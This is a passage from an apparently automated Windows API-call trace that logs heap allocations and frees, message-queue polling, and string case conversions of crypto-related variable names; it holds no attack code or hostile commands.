(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0229.068] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0229.068] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.068] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0229.068] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0229.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0229.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0229.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0229.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0229.070] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0229.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0229.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0229.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0229.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0229.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0229.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0229.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0229.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0229.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0229.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0229.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.073] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0229.073] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0229.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0229.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0229.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0229.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.075] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.075] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0229.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0229.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.077] RtlAllocateHeap 